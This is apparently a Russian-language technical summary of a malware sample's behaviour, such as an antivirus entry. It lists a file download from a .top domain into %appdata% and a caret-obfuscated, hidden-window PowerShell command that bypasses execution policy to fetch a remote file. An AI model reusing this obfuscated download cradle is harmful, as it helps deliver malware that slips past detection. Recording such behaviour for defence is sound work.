Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^eR^s^hE^LL.^e^Xe -E^x^ECut^I^oNPo^li^C^Y B^Ypa^S^s -nopRo^f^iL^e -W^i^n^doWSTYle HIdD^En^ (^NE^w^-obJ^ec^t^ s^Y^sTE^m.NET^.WEbC^l^I^E^nt).DOw^NlOADFi^lE('http://toagoores....
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "poW^eR^s^hE^LL.^e^Xe -E^x^ECut^I^oNPo^li^C^Y B^Ypa^S^s -nopRo^f^iL^e -W^i^n^doWSTYle HIdD^En^ (^NE^w^-obJ^ec^t^ s^Y^sTE^m.NET^.WEbC^l^I^E^nt).DOw^NlOADFi^lE('http://toagoores....' (со скрытым окном)